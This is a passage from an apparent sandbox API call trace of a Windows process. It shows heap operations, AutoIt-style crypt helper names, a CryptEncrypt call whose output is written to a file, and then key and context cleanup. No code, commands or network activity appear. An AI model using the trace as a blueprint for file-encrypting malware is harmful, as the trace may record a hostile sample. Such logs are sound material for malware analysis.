hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x11a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x120) returned 1 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.079] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0086.080] CharLowerBuffW (in: lpsz="byte[289]", cchLength=0x9 | out: lpsz="byte[289]") returned 0x9 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0086.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.144] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0086.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca538 [0086.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca538, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.145] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e8288*, pdwDataLen=0x144e790*=0x11a, dwBufLen=0x120 | out: pbData=0x43e8288*, pdwDataLen=0x144e790*=0x120) returned 1 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0086.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0086.145] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.146] WriteFile (in: hFile=0x258, lpBuffer=0x43cce80*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x43cce80*, lpNumberOfBytesWritten=0x144f194*=0x120, lpOverlapped=0x0) returned 1 [0086.147] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0086.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0086.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0086.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0086.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca088, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0086.147] CryptDestroyKey (hKey=0x41ac700) returned 1 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.148] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0086.148] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.148] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.194] TranslateMessage (lpMsg=0x144ee2c) returned 0 [0086.194] DispatchMessageW (lpMsg=0x144ee2c) returned 0x0 [0086.194] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0086.194] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0086.194] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0086.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0086.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0086.194] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0086.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0086.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0086.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca148 [0086.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0086.195] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0086.195] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0086.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0086.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0086.197] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0086.197] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0086.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.198] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0086.199] FreeLibrary (hLibModule=0x756e0000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.199] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0086.199] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0086.199] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0086.199] CloseHandle (hObject=0x298) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0086.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.200] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.200] CloseHandle (hObject=0x258) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 